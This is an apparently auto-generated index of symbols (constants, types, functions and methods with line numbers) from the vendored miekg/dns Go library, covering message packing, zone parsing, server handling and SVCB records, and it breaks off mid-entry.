FILE: vendor/github.com/miekg/dns/listen_no_reuseport.go constant supportsReusePort (line 8) | supportsReusePort = false function listenTCP (line 10) | func listenTCP(network, addr string, reuseport, reuseaddr bool) (net.Lis... constant supportsReuseAddr (line 18) | supportsReuseAddr = false function listenUDP (line 20) | func listenUDP(network, addr string, reuseport, reuseaddr bool) (net.Pac... FILE: vendor/github.com/miekg/dns/listen_reuseport.go constant supportsReusePort (line 14) | supportsReusePort = true function reuseportControl (line 16) | func reuseportControl(network, address string, c syscall.RawConn) error { constant supportsReuseAddr (line 28) | supportsReuseAddr = true function reuseaddrControl (line 30) | func reuseaddrControl(network, address string, c syscall.RawConn) error { function listenTCP (line 42) | func listenTCP(network, addr string, reuseport, reuseaddr bool) (net.Lis... function listenUDP (line 55) | func listenUDP(network, addr string, reuseport, reuseaddr bool) (net.Pac... FILE: vendor/github.com/miekg/dns/msg.go constant maxCompressionOffset (line 23) | maxCompressionOffset = 2 << 13 constant maxDomainNameWireOctets (line 24) | maxDomainNameWireOctets = 255 constant maxCompressionPointers (line 36) | maxCompressionPointers = (maxDomainNameWireOctets+1)/2 - 2 constant maxDomainNamePresentationLength (line 46) | maxDomainNamePresentationLength = 61*4 + 1 + 63*4 + 1 + 63*4 + 1 + 63*4 + 1 function id (line 84) | func id() uint16 { type MsgHdr (line 94) | type MsgHdr struct method String (line 678) | func (h *MsgHdr) String() string { type Msg (line 109) | type Msg struct method Pack (line 719) | func (dns *Msg) Pack() (msg []byte, err error) { method PackBuffer (line 724) | func (dns *Msg) PackBuffer(buf []byte) (msg []byte, err error) { method packBufferWithCompressionMap (line 736) | func (dns *Msg) packBufferWithCompressionMap(buf []byte, compression c... method unpack (line 824) | func (dns *Msg) unpack(dh Header, msg []byte, off int) (err error) { method Unpack (line 881) | func (dns *Msg) Unpack(msg []byte) (err error) { method String (line 892) | func (dns *Msg) String() string { method isCompressible (line 959) | func (dns *Msg) isCompressible() bool { method Len (line 969) | func (dns *Msg) Len() int { method Copy (line 1071) | func (dns *Msg) Copy() *Msg { return dns.CopyTo(new(Msg)) } method CopyTo (line 1074) | func (dns *Msg) CopyTo(r1 *Msg) *Msg { method setHdr (line 1206) | func (dns *Msg) setHdr(dh Header) { type compressionMap (line 167) | type compressionMap struct method valid (line 172) | func (m compressionMap) valid() bool { method insert (line 176) | func (m compressionMap) insert(s string, pos int) { method find (line 184) | func (m compressionMap) find(s string) (int, bool) { function PackDomainName (line 201) | func PackDomainName(s string, msg []byte, off int, compression map[strin... function packDomainName (line 205) | func packDomainName(s string, msg []byte, off int, compression compressi... function isRootLabel (line 351) | func isRootLabel(s string, bs []byte, off, end int) bool { function UnpackDomainName (line 378) | func UnpackDomainName(msg []byte, off int) (string, int, error) { function packTxt (line 451) | func packTxt(txt []string, msg []byte, offset int) (int, error) { function packTxtString (line 469) | func packTxtString(s string, msg []byte, offset int) (int, error) { function packOctetString (line 504) | func packOctetString(s string, msg []byte, offset int) (int, error) { function unpackTxt (line 532) | func unpackTxt(msg []byte, off0 int) (ss []string, off int, err error) { function isDigit (line 545) | func isDigit(b byte) bool { return b >= '0' && b <= '9' } function isDDD (line 547) | func isDDD[T ~[]byte | ~string](s T) bool { function dddToByte (line 551) | func dddToByte[T ~[]byte | ~string](s T) byte { function intToBytes (line 557) | func intToBytes(i *big.Int, length int) []byte { function PackRR (line 569) | func PackRR(rr RR, msg []byte, off int, compression map[string]int, comp... function packRR (line 579) | func packRR(rr RR, msg []byte, off int, compression compressionMap, comp... function UnpackRR (line 605) | func UnpackRR(msg []byte, off int) (rr RR, off1 int, err error) { function UnpackRRWithHeader (line 616) | func UnpackRRWithHeader(h RR_Header, msg []byte, off int) (rr RR, off1 i... function unpackRRslice (line 650) | func unpackRRslice(l int, msg []byte, off int) (dst1 []RR, off1 int, err... function msgLenWithCompressionMap (line 980) | func msgLenWithCompressionMap(dns *Msg, compression map[string]struct{})... function domainNameLen (line 1005) | func domainNameLen(s string, off int, compression map[string]struct{}, c... function escapedNameLen (line 1031) | func escapedNameLen(s string) int { function compressionLenSearch (line 1050) | func compressionLenSearch(c map[string]struct{}, s string, msgOff int) (... function Copy (line 1065) | func Copy(r RR) RR { return r.copy() } function Len (line 1068) | func Len(r RR) int { return r.len(0, nil) } method pack (line 1103) | func (q *Question) pack(msg []byte, off int, compression compressionMap,... function unpackQuestion (line 1119) | func unpackQuestion(msg []byte, off int) (Question, int, error) { method pack (line 1145) | func (dh *Header) pack(msg []byte, off int, compression compressionMap, ... function unpackMsgHdr (line 1173) | func unpackMsgHdr(msg []byte, off int) (Header, int, error) { FILE: vendor/github.com/miekg/dns/msg_helpers.go function unpackDataA (line 19) | func unpackDataA(msg []byte, off int) (net.IP, int, error) { function packDataA (line 26) | func packDataA(a net.IP, msg []byte, off int) (int, error) { function unpackDataAAAA (line 44) | func unpackDataAAAA(msg []byte, off int) (net.IP, int, error) { function packDataAAAA (line 51) | func packDataAAAA(aaaa net.IP, msg []byte, off int) (int, error) { function unpackHeader (line 70) | func unpackHeader(msg []byte, off int) (rr RR_Header, off1 int, truncmsg... method packHeader (line 102) | func (hdr RR_Header) packHeader(msg []byte, off int, compression compres... function truncateMsgFromRdlength (line 134) | func truncateMsgFromRdlength(msg []byte, off int, rdlength uint16) (trun... function fromBase32 (line 144) | func fromBase32(s []byte) (buf []byte, err error) { function toBase32 (line 157) | func toBase32(b []byte) string { function fromBase64 (line 161) | func fromBase64(s []byte) (buf []byte, err error) { function toBase64 (line 169) | func toBase64(b []byte) string { return base64.StdEncoding.EncodeToStrin... function noRdata (line 172) | func noRdata(h RR_Header) bool { return h.Rdlength == 0 } function unpackUint8 (line 174) | func unpackUint8(msg []byte, off int) (i uint8, off1 int, err error) { function packUint8 (line 181) | func packUint8(i uint8, msg []byte, off int) (off1 int, err error) { function unpackUint16 (line 189) | func unpackUint16(msg []byte, off int) (i uint16, off1 int, err error) { function packUint16 (line 196) | func packUint16(i uint16, msg []byte, off int) (off1 int, err error) { function unpackUint32 (line 204) | func unpackUint32(msg []byte, off int) (i uint32, off1 int, err error) { function packUint32 (line 211) | func packUint32(i uint32, msg []byte, off int) (off1 int, err error) { function unpackUint48 (line 219) | func unpackUint48(msg []byte, off int) (i uint64, off1 int, err error) { function packUint48 (line 230) | func packUint48(i uint64, msg []byte, off int) (off1 int, err error) { function unpackUint64 (line 244) | func unpackUint64(msg []byte, off int) (i uint64, off1 int, err error) { function packUint64 (line 251) | func packUint64(i uint64, msg []byte, off int) (off1 int, err error) { function unpackString (line 260) | func unpackString(msg []byte, off int) (string, int, error) { function packString (line 297) | func packString(s string, msg []byte, off int) (int, error) { function unpackStringBase32 (line 305) | func unpackStringBase32(msg []byte, off, end int) (string, int, error) { function packStringBase32 (line 313) | func packStringBase32(s string, msg []byte, off int) (int, error) { function unpackStringBase64 (line 326) | func unpackStringBase64(msg []byte, off, end int) (string, int, error) { function packStringBase64 (line 337) | func packStringBase64(s string, msg []byte, off int) (int, error) { function unpackStringHex (line 350) | func unpackStringHex(msg []byte, off, end int) (string, int, error) { function packStringHex (line 362) | func packStringHex(s string, msg []byte, off int) (int, error) { function unpackStringAny (line 375) | func unpackStringAny(msg []byte, off, end int) (string, int, error) { function packStringAny (line 382) | func packStringAny(s string, msg []byte, off int) (int, error) { function unpackStringTxt (line 391) | func unpackStringTxt(msg []byte, off int) ([]string, int, error) { function packStringTxt (line 399) | func packStringTxt(s []string, msg []byte, off int) (int, error) { function unpackDataOpt (line 407) | func unpackDataOpt(msg []byte, off int) ([]EDNS0, int, error) { function packDataOpt (line 430) | func packDataOpt(options []EDNS0, msg []byte, off int) (int, error) { function unpackStringOctet (line 449) | func unpackStringOctet(msg []byte, off int) (string, int, error) { function packStringOctet (line 454) | func packStringOctet(s string, msg []byte, off int) (int, error) { function unpackDataNsec (line 462) | func unpackDataNsec(msg []byte, off int) ([]uint16, int, error) { function typeBitMapLen (line 524) | func typeBitMapLen(bitmap []uint16) int { function packDataNsec (line 545) | func packDataNsec(bitmap []uint16, msg []byte, off int) (int, error) { function unpackDataSVCB (line 585) | func unpackDataSVCB(msg []byte, off int) ([]SVCBKeyValue, int, error) { function packDataSVCB (line 615) | func packDataSVCB(pairs []SVCBKeyValue, msg []byte, off int) (int, error) { function unpackDataDomainNames (line 644) | func unpackDataDomainNames(msg []byte, off, end int) ([]string, int, err... function packDataDomainNames (line 663) | func packDataDomainNames(names []string, msg []byte, off int, compressio... function packDataApl (line 674) | func packDataApl(data []APLPrefix, msg []byte, off int) (int, error) { function packDataAplPrefix (line 685) | func packDataAplPrefix(p *APLPrefix, msg []byte, off int) (int, error) { function unpackDataApl (line 736) | func unpackDataApl(msg []byte, off int) ([]APLPrefix, int, error) { function unpackDataAplPrefix (line 749) | func unpackDataAplPrefix(msg []byte, off int) (APLPrefix, int, error) { function unpackIPSECGateway (line 802) | func unpackIPSECGateway(msg []byte, off int, gatewayType uint8) (net.IP,... function packIPSECGateway (line 820) | func packIPSECGateway(gatewayAddr net.IP, gatewayString string, msg []by... FILE: vendor/github.com/miekg/dns/msg_truncate.go method Truncate (line 29) | func (dns *Msg) Truncate(size int) { function truncateLoop (line 99) | func truncateLoop(rrs []RR, size, l int, compression map[string]struct{}... FILE: vendor/github.com/miekg/dns/nsecx.go function HashName (line 10) | func HashName(label string, ha uint8, iter uint16, salt string) string { method Cover (line 47) | func (rr *NSEC3) Cover(name string) bool { method Match (line 79) | func (rr *NSEC3) Match(name string) bool { FILE: vendor/github.com/miekg/dns/privaterr.go type PrivateRdata (line 8) | type PrivateRdata interface type PrivateRR (line 25) | type PrivateRR struct method Header (line 33) | func (r *PrivateRR) Header() *RR_Header { return &r.Hdr } method String (line 35) | func (r *PrivateRR) String() string { return r.Hdr.String() + r.Data.S... method len (line 38) | func (r *PrivateRR) len(off int, compression map[string]struct{}) int { method copy (line 44) | func (r *PrivateRR) copy() RR { method pack (line 55) | func (r *PrivateRR) pack(msg []byte, off int, compression compressionM... method unpack (line 64) | func (r *PrivateRR) unpack(msg []byte, off int) (int, error) { method parse (line 70) | func (r *PrivateRR) parse(c *zlexer, origin string) *ParseError { method isDuplicate (line 93) | func (r *PrivateRR) isDuplicate(r2 RR) bool { return false } function PrivateHandle (line 97) | func PrivateHandle(rtypestr string, rtype uint16, generator func() Priva... function PrivateHandleRemove (line 106) | func PrivateHandleRemove(rtype uint16) { FILE: vendor/github.com/miekg/dns/reverse.go function init (line 15) | func init() { function reverseInt8 (line 30) | func reverseInt8(m map[uint8]string) map[string]uint8 { function reverseInt16 (line 38) | func reverseInt16(m map[uint16]string) map[string]uint16 { function reverseInt (line 46) | func reverseInt(m map[int]string) map[string]int { FILE: vendor/github.com/miekg/dns/sanitize.go function Dedup (line 7) | func Dedup(rrs []RR, m map[string]RR) []RR { function normalizedString (line 56) | func normalizedString(r RR) string { FILE: vendor/github.com/miekg/dns/scan.go constant maxTok (line 15) | maxTok = 512 constant maxIncludeDepth (line 19) | maxIncludeDepth = 7 constant zEOF (line 29) | zEOF = iota constant zString (line 30) | zString constant zBlank (line 31) | zBlank constant zQuote (line 32) | zQuote constant zNewline (line 33) | zNewline constant zRrtpe (line 34) | zRrtpe constant zOwner (line 35) | zOwner constant zClass (line 36) | zClass constant zDirOrigin (line 37) | zDirOrigin constant zDirTTL (line 38) | zDirTTL constant zDirInclude (line 39) | zDirInclude constant zDirGenerate (line 40) | zDirGenerate constant zValue (line 43) | zValue constant zKey (line 44) | zKey constant zExpectOwnerDir (line 46) | zExpectOwnerDir constant zExpectOwnerBl (line 47) | zExpectOwnerBl constant zExpectAny (line 48) | zExpectAny constant zExpectAnyNoClass (line 49) | zExpectAnyNoClass constant zExpectAnyNoClassBl (line 50) | zExpectAnyNoClassBl constant zExpectAnyNoTTL (line 51) | zExpectAnyNoTTL constant zExpectAnyNoTTLBl (line 52) | zExpectAnyNoTTLBl constant zExpectRrtype (line 53) | zExpectRrtype constant zExpectRrtypeBl (line 54) | zExpectRrtypeBl constant zExpectRdata (line 55) | zExpectRdata constant zExpectDirTTLBl (line 56) | zExpectDirTTLBl constant zExpectDirTTL (line 57) | zExpectDirTTL constant zExpectDirOriginBl (line 58) | zExpectDirOriginBl constant zExpectDirOrigin (line 59) | zExpectDirOrigin constant zExpectDirIncludeBl (line 60) | zExpectDirIncludeBl constant zExpectDirInclude (line 61) | zExpectDirInclude constant zExpectDirGenerate (line 62) | zExpectDirGenerate constant zExpectDirGenerateBl (line 63) | zExpectDirGenerateBl type ParseError (line 68) | type ParseError struct method Error (line 75) | func (e *ParseError) Error() (s string) { method Unwrap (line 87) | func (e *ParseError) Unwrap() error { return e.wrappedErr } type lex (line 89) | type lex struct type ttlState (line 99) | type ttlState struct function NewRR (line 110) | func NewRR(s string) (RR, error) { function ReadRR (line 123) | func ReadRR(r io.Reader, file string) (RR, error) { type ZoneParser (line 164) | type ZoneParser struct method SetDefaultTTL (line 215) | func (zp *ZoneParser) SetDefaultTTL(ttl uint32) { method SetIncludeAllowed (line 228) | func (zp *ZoneParser) SetIncludeAllowed(v bool) { method SetIncludeFS (line 246) | func (zp *ZoneParser) SetIncludeFS(fsys fs.FS) { method Err (line 252) | func (zp *ZoneParser) Err() error { method setParseError (line 266) | func (zp *ZoneParser) setParseError(err string, l lex) (RR, bool) { method Comment (line 273) | func (zp *ZoneParser) Comment() string { method subNext (line 285) | func (zp *ZoneParser) subNext() (RR, bool) { method Next (line 311) | func (zp *ZoneParser) Next() (RR, bool) { function NewZoneParser (line 195) | func NewZoneParser(r io.Reader, origin, file string) *ZoneParser { type zlexer (line 701) | type zlexer struct method Err (line 742) | func (zl *zlexer) Err() error { method readByte (line 751) | func (zl *zlexer) readByte() (byte, bool) { method Peek (line 779) | func (zl *zlexer) Peek() lex { method Next (line 800) | func (zl *zlexer) Next() (lex, bool) { method Comment (line 1195) | func (zl *zlexer) Comment() string { function newZLexer (line 727) | func newZLexer(r io.Reader) *zlexer { function classToInt (line 1204) | func classToInt(token string) (uint16, bool) { function typeToInt (line 1217) | func typeToInt(token string) (uint16, bool) { function stringToTTL (line 1230) | func stringToTTL(token string) (uint32, bool) { function stringToCm (line 1262) | func stringToCm(token string) (e, m uint8, ok bool) { function toAbsoluteName (line 1308) | func toAbsoluteName(name, origin string) (absolute string, ok bool) { function appendOrigin (line 1336) | func appendOrigin(name, origin string) string { function locCheckNorth (line 1344) | func locCheckNorth(token string, latitude uint32) (uint32, bool) { function locCheckEast (line 1358) | func locCheckEast(token string, longitude uint32) (uint32, bool) { function slurpRemainder (line 1372) | func slurpRemainder(c *zlexer) *ParseError { function stringToNodeID (line 1390) | func stringToNodeID(l lex) (uint64, *ParseError) { FILE: vendor/github.com/miekg/dns/scan_rr.go function endingToString (line 14) | func endingToString(c *zlexer, errstr string) (string, *ParseError) { function endingToTxtSlice (line 36) | func endingToTxtSlice(c *zlexer, errstr string) ([]string, *ParseError) { method parse (line 97) | func (rr *A) parse(c *zlexer, o string) *ParseError { method parse (line 111) | func (rr *AAAA) parse(c *zlexer, o string) *ParseError { method parse (line 123) | func (rr *NS) parse(c *zlexer, o string) *ParseError { method parse (line 133) | func (rr *PTR) parse(c *zlexer, o string) *ParseError { method parse (line 143) | func (rr *NSAPPTR) parse(c *zlexer, o string) *ParseError { method parse (line 153) | func (rr *RP) parse(c *zlexer, o string) *ParseError { method parse (line 174) | func (rr *MR) parse(c *zlexer, o string) *ParseError { method parse (line 184) | func (rr *MB) parse(c *zlexer, o string) *ParseError { method parse (line 194) | func (rr *MG) parse(c *zlexer, o string) *ParseError { method parse (line 204) | func (rr *HINFO) parse(c *zlexer, o string) *ParseError { method parse (line 227) | func (rr *ISDN) parse(c *zlexer, o string) *ParseError { method parse (line 250) | func (rr *MINFO) parse(c *zlexer, o string) *ParseError { method parse (line 271) | func (rr *MF) parse(c *zlexer, o string) *ParseError { method parse (line 281) | func (rr *MD) parse(c *zlexer, o string) *ParseError { method parse (line 291) | func (rr *MX) parse(c *zlexer, o string) *ParseError { method parse (line 312) | func (rr *RT) parse(c *zlexer, o string) *ParseError { method parse (line 333) | func (rr *AFSDB) parse(c *zlexer, o string) *ParseError { method parse (line 353) | func (rr *X25) parse(c *zlexer, o string) *ParseError { method parse (line 362) | func (rr *KX) parse(c *zlexer, o string) *ParseError { method parse (line 382) | func (rr *CNAME) parse(c *zlexer, o string) *ParseError { method parse (line 392) | func (rr *DNAME) parse(c *zlexer, o string) *ParseError { method parse (line 402) | func (rr *SOA) parse(c *zlexer, o string) *ParseError { method parse (line 464) | func (rr *SRV) parse(c *zlexer, o string) *ParseError { method parse (line 500) | func (rr *NAPTR) parse(c *zlexer, o string) *ParseError { method parse (line 586) | func (rr *TALINK) parse(c *zlexer, o string) *ParseError { method parse (line 607) | func (rr *LOC) parse(c *zlexer, o string) *ParseError { method parse (line 738) | func (rr *HIP) parse(c *zlexer, o string) *ParseError { method parse (line 790) | func (rr *CERT) parse(c *zlexer, o string) *ParseError { method parse (line 823) | func (rr *OPENPGPKEY) parse(c *zlexer, o string) *ParseError { method parse (line 832) | func (rr *CSYNC) parse(c *zlexer, o string) *ParseError { method parse (line 877) | func (rr *ZONEMD) parse(c *zlexer, o string) *ParseError { method parse (line 909) | func (rr *SIG) parse(c *zlexer, o string) *ParseError { return rr.RRSIG.... method parse (line 911) | func (rr *RRSIG) parse(c *zlexer, o string) *ParseError { method parse (line 1010) | func (rr *NXT) parse(c *zlexer, o string) *ParseError { return rr.NSEC.p... method parse (line 1012) | func (rr *NSEC) parse(c *zlexer, o string) *ParseError { method parse (line 1046) | func (rr *NSEC3) parse(c *zlexer, o string) *ParseError { method parse (line 1111) | func (rr *NSEC3PARAM) parse(c *zlexer, o string) *ParseError { method parse (line 1141) | func (rr *EUI48) parse(c *zlexer, o string) *ParseError { method parse (line 1167) | func (rr *EUI64) parse(c *zlexer, o string) *ParseError { method parse (line 1193) | func (rr *SSHFP) parse(c *zlexer, o string) *ParseError { method parseDNSKEY (line 1216) | func (rr *DNSKEY) parseDNSKEY(c *zlexer, o, typ string) *ParseError { method parse (line 1245) | func (rr *DNSKEY) parse(c *zlexer, o string) *ParseError { return rr.pa... method parse (line 1246) | func (rr *KEY) parse(c *zlexer, o string) *ParseError { return rr.pa... method parse (line 1247) | func (rr *CDNSKEY) parse(c *zlexer, o string) *ParseError { return rr.pa... method parse (line 1248) | func (rr *DS) parse(c *zlexer, o string) *ParseError { return rr.pa... method parse (line 1249) | func (rr *DLV) parse(c *zlexer, o string) *ParseError { return rr.pa... method parse (line 1250) | func (rr *CDS) parse(c *zlexer, o string) *ParseError { return rr.pa... method parse (line 1252) | func (rr *IPSECKEY) parse(c *zlexer, o string) *ParseError { method parse (line 1297) | func (rr *AMTRELAY) parse(c *zlexer, o string) *ParseError { function parseAddrHostUnion (line 1338) | func parseAddrHostUnion(token, o string, gatewayType uint8) (addr net.IP... method parse (line 1363) | func (rr *RKEY) parse(c *zlexer, o string) *ParseError { method parse (line 1392) | func (rr *EID) parse(c *zlexer, o string) *ParseError { method parse (line 1401) | func (rr *NIMLOC) parse(c *zlexer, o string) *ParseError { method parse (line 1410) | func (rr *GPOS) parse(c *zlexer, o string) *ParseError { method parseDS (line 1434) | func (rr *DS) parseDS(c *zlexer, o, typ string) *ParseError { method parse (line 1468) | func (rr *TA) parse(c *zlexer, o string) *ParseError { method parse (line 1502) | func (rr *TLSA) parse(c *zlexer, o string) *ParseError { method parse (line 1532) | func (rr *SMIMEA) parse(c *zlexer, o string) *ParseError { method parse (line 1562) | func (rr *RFC3597) parse(c *zlexer, o string) *ParseError { method parse (line 1586) | func (rr *SPF) parse(c *zlexer, o string) *ParseError { method parse (line 1595) | func (rr *AVC) parse(c *zlexer, o string) *ParseError { method parse (line 1604) | func (rr *TXT) parse(c *zlexer, o string) *ParseError { method parse (line 1615) | func (rr *NINFO) parse(c *zlexer, o string) *ParseError { method parse (line 1624) | func (rr *URI) parse(c *zlexer, o string) *ParseError { method parse (line 1651) | func (rr *DHCID) parse(c *zlexer, o string) *ParseError { method parse (line 1661) | func (rr *NID) parse(c *zlexer, o string) *ParseError { method parse (line 1678) | func (rr *L32) parse(c *zlexer, o string) *ParseError { method parse (line 1694) | func (rr *LP) parse(c *zlexer, o string) *ParseError { method parse (line 1713) | func (rr *L64) parse(c *zlexer, o string) *ParseError { method parse (line 1730) | func (rr *UID) parse(c *zlexer, o string) *ParseError { method parse (line 1740) | func (rr *GID) parse(c *zlexer, o string) *ParseError { method parse (line 1750) | func (rr *UINFO) parse(c *zlexer, o string) *ParseError { method parse (line 1762) | func (rr *PX) parse(c *zlexer, o string) *ParseError { method parse (line 1790) | func (rr *CAA) parse(c *zlexer, o string) *ParseError { method parse (line 1817) | func (rr *TKEY) parse(c *zlexer, o string) *ParseError { method parse (line 1858) | func (rr *APL) parse(c *zlexer, o string) *ParseError { FILE: vendor/github.com/miekg/dns/serve_mux.go type ServeMux (line 18) | type ServeMux struct method match (line 31) | func (mux *ServeMux) match(q string, t uint16) Handler { method Handle (line 60) | func (mux *ServeMux) Handle(pattern string, handler Handler) { method HandleFunc (line 73) | func (mux *ServeMux) HandleFunc(pattern string, handler func(ResponseW... method HandleRemove (line 78) | func (mux *ServeMux) HandleRemove(pattern string) { method ServeDNS (line 96) | func (mux *ServeMux) ServeDNS(w ResponseWriter, req *Msg) { function NewServeMux (line 24) | func NewServeMux() *ServeMux { function Handle (line 112) | func Handle(pattern string, handler Handler) { DefaultServeMux.Handle(pa... function HandleRemove (line 116) | func HandleRemove(pattern string) { DefaultServeMux.HandleRemove(pattern) } function HandleFunc (line 120) | func HandleFunc(pattern string, handler func(ResponseWriter, *Msg)) { FILE: vendor/github.com/miekg/dns/server.go constant maxTCPQueries (line 18) | maxTCPQueries = 128 type Handler (line 25) | type Handler interface type HandlerFunc (line 33) | type HandlerFunc method ServeDNS (line 36) | func (f HandlerFunc) ServeDNS(w ResponseWriter, r *Msg) { type ResponseWriter (line 42) | type ResponseWriter interface type ConnectionStater (line 64) | type ConnectionStater interface type response (line 68) | type response struct method WriteMsg (line 727) | func (w *response) WriteMsg(m *Msg) (err error) { method Write (line 752) | func (w *response) Write(m []byte) (int, error) { method LocalAddr (line 778) | func (w *response) LocalAddr() net.Addr { method RemoteAddr (line 790) | func (w *response) RemoteAddr() net.Addr { method TsigStatus (line 804) | func (w *response) TsigStatus() error { return w.tsigStatus } method TsigTimersOnly (line 807) | func (w *response) TsigTimersOnly(b bool) { w.tsigTimersOnly = b } method Hijack (line 810) | func (w *response) Hijack() { w.hijacked = true } method Close (line 813) | func (w *response) Close() error { method ConnectionState (line 831) | func (w *response) ConnectionState() *tls.ConnectionState { function handleRefused (line 83) | func handleRefused(w ResponseWriter, r *Msg) { function HandleFailed (line 91) | func HandleFailed(w ResponseWriter, r *Msg) { function ListenAndServe (line 100) | func ListenAndServe(addr string, network string, handler Handler) error { function ListenAndServeTLS (line 107) | func ListenAndServeTLS(addr, certFile, keyFile string, handler Handler) ... function ActivateAndServe (line 131) | func ActivateAndServe(l net.Listener, p net.PacketConn, handler Handler)... type Writer (line 137) | type Writer interface type Reader (line 142) | type Reader interface type PacketConnReader (line 152) | type PacketConnReader interface type defaultReader (line 163) | type defaultReader struct method ReadTCP (line 169) | func (dr defaultReader) ReadTCP(conn net.Conn, timeout time.Duration) ... method ReadUDP (line 173) | func (dr defaultReader) ReadUDP(conn *net.UDPConn, timeout time.Durati... method ReadPacketConn (line 177) | func (dr defaultReader) ReadPacketConn(conn net.PacketConn, timeout ti... type DecorateReader (line 185) | type DecorateReader type DecorateWriter (line 189) | type DecorateWriter type Server (line 192) | type Server struct method tsigProvider (line 247) | func (srv *Server) tsigProvider() TsigProvider { method isStarted (line 257) | func (srv *Server) isStarted() bool { method init (line 270) | func (srv *Server) init() { method ListenAndServe (line 293) | func (srv *Server) ListenAndServe() error { method ActivateAndServe (line 353) | func (srv *Server) ActivateAndServe() error { method Shutdown (line 386) | func (srv *Server) Shutdown() error { method ShutdownContext (line 395) | func (srv *Server) ShutdownContext(ctx context.Context) error { method getReadTimeout (line 439) | func (srv *Server) getReadTimeout() time.Duration { method serveTCP (line 447) | func (srv *Server) serveTCP(l net.Listener) error { method serveUDP (line 483) | func (srv *Server) serveUDP(l net.PacketConn) error { method serveTCPConn (line 544) | func (srv *Server) serveTCPConn(wg *sync.WaitGroup, rw net.Conn) { method serveUDPPacket (line 599) | func (srv *Server) serveUDPPacket(wg *sync.WaitGroup, m []byte, u net.... method serveDNS (line 611) | func (srv *Server) serveDNS(m []byte, w *response) { method readTCP (line 666) | func (srv *Server) readTCP(conn net.Conn, timeout time.Duration) ([]by... method readUDP (line 690) | func (srv *Server) readUDP(conn *net.UDPConn, timeout time.Duration) (... method readPacketConn (line 708) | func (srv *Server) readPacketConn(conn net.PacketConn, timeout time.Du... function makeUDPBuffer (line 264) | func makeUDPBuffer(size int) func() interface{} { function unlockOnce (line 287) | func unlockOnce(l sync.Locker) func() { FILE: vendor/github.com/miekg/dns/sig0.go method Sign (line 17) | func (rr *SIG) Sign(k crypto.Signer, m *Msg) ([]byte, error) { method Verify (line 77) | func (rr *SIG) Verify(k *KEY, buf []byte) error { FILE: vendor/github.com/miekg/dns/smimea.go method Sign (line 10) | func (r *SMIMEA) Sign(usage, selector, matchingType int, cert *x509.Cert... method Verify (line 22) | func (r *SMIMEA) Verify(cert *x509.Certificate) error { function SMIMEAName (line 35) | func SMIMEAName(email, domain string) (string, error) { FILE: vendor/github.com/miekg/dns/svcb.go type SVCBKey (line 15) | type SVCBKey method String (line 55) | func (key SVCBKey) String() string { constant SVCB_MANDATORY (line 19) | SVCB_MANDATORY SVCBKey = iota constant SVCB_ALPN (line 20) | SVCB_ALPN constant SVCB_NO_DEFAULT_ALPN (line 21) | SVCB_NO_DEFAULT_ALPN constant SVCB_PORT (line 22) | SVCB_PORT constant SVCB_IPV4HINT (line 23) | SVCB_IPV4HINT constant SVCB_ECHCONFIG (line 24) | SVCB_ECHCONFIG constant SVCB_IPV6HINT (line 25) | SVCB_IPV6HINT constant SVCB_DOHPATH (line 26) | SVCB_DOHPATH constant svcb_RESERVED (line 28) | svcb_RESERVED SVCBKey = 65535 function reverseSVCBKeyMap (line 44) | func reverseSVCBKeyMap(m map[SVCBKey]string) map[string]SVCBKey { function svcbStringToKey (line 68) | func svcbStringToKey(s string) SVCBKey { function makeSVCBKeyValue (line 186) | func makeSVCBKeyValue(key SVCBKey) SVCBKeyValue { type SVCB (line 218) | type SVCB struct method parse (line 84) | func (rr *SVCB) parse(c *zlexer, o string) *ParseError { method String (line 857) | func (rr *SVCB) String() string { type HTTPS (line 231) | type HTTPS struct method String (line 235) | func (rr *HTTPS) String() string { method parse (line 239) | func (rr *HTTPS) parse(c *zlexer, o string) *ParseError { type SVCBKeyValue (line 245) | type SVCBKeyValue interface type SVCBMandatory (line 277) | type SVCBMandatory struct method Key (line 281) | func (*SVCBMandatory) Key() SVCBKey { return SVCB_MANDATORY } method String (line 283) | func (s *SVCBMandatory) String() string { method pack (line 291) | func (s *SVCBMandatory) pack() ([]byte, error) { method unpack (line 303) | func (s *SVCBMandatory) unpack(b []byte) error { method parse (line 316) | func (s *SVCBMandatory) parse(b string) error { method len (line 327) | func (s *SVCBMandatory) len() int { method copy (line 331) | func (s *SVCBMandatory) copy() SVCBKeyValue { type SVCBAlpn (line 346) | type SVCBAlpn struct method Key (line 350) | func (*SVCBAlpn) Key() SVCBKey { return SVCB_ALPN } method String (line 352) | func (s *SVCBAlpn) String() string { method pack (line 397) | func (s *SVCBAlpn) pack() ([]byte, error) { method unpack (line 413) | func (s *SVCBAlpn) unpack(b []byte) error { method parse (line 429) | func (s *SVCBAlpn) parse(b string) error { method len (line 474) | func (s *SVCBAlpn) len() int { method copy (line 482) | func (s *SVCBAlpn) copy() SVCBKeyValue { type SVCBNoDefaultAlpn (line 496) | type SVCBNoDefaultAlpn struct method Key (line 498) | func (*SVCBNoDefaultAlpn) Key() SVCBKey { return SVCB_NO_DEFA... method copy (line 499) | func (*SVCBNoDefaultAlpn) copy() SVCBKeyValue { return &SVCBNoDefau... method pack (line 500) | func (*SVCBNoDefaultAlpn) pack() ([]byte, error) { return []byte{}, nil } method String (line 501) | func (*SVCBNoDefaultAlpn) String() string { return "" } method len (line 502) | func (*SVCBNoDefaultAlpn) len() int { return 0 } method unpack (line 504) | func (*SVCBNoDefaultAlpn) unpack(b []byte) error { method parse (line 511) | func (*SVCBNoDefaultAlpn) parse(b string) error { type SVCBPort (line 525) | type SVCBPort struct method Key (line 529) | func (*SVCBPort) Key() SVCBKey { return SVCB_PORT } method len (line 530) | func (*SVCBPort) len() int { return 2 } method String (line 531) | func (s *SVCBPort) String() string { return strconv.FormatUint(uin... method copy (line 532) | func (s *SVCBPort) copy() SVCBKeyValue { return &SVCBPort{s.Port} } method unpack (line 534) | func (s *SVCBPort) unpack(b []byte) error { method pack (line 542) | func (s *SVCBPort) pack() ([]byte, error) { method parse (line 548) | func (s *SVCBPort) parse(b string) error { type SVCBIPv4Hint (line 572) | type SVCBIPv4Hint struct method Key (line 576) | func (*SVCBIPv4Hint) Key() SVCBKey { return SVCB_IPV4HINT } method len (line 577) | func (s *SVCBIPv4Hint) len() int { return 4 * len(s.Hint) } method pack (line 579) | func (s *SVCBIPv4Hint) pack() ([]byte, error) { method unpack (line 591) | func (s *SVCBIPv4Hint) unpack(b []byte) error { method String (line 604) | func (s *SVCBIPv4Hint) String() string { method parse (line 616) | func (s *SVCBIPv4Hint) parse(b string) error { method copy (line 638) | func (s *SVCBIPv4Hint) copy() SVCBKeyValue { type SVCBECHConfig (line 654) | type SVCBECHConfig struct method Key (line 658) | func (*SVCBECHConfig) Key() SVCBKey { return 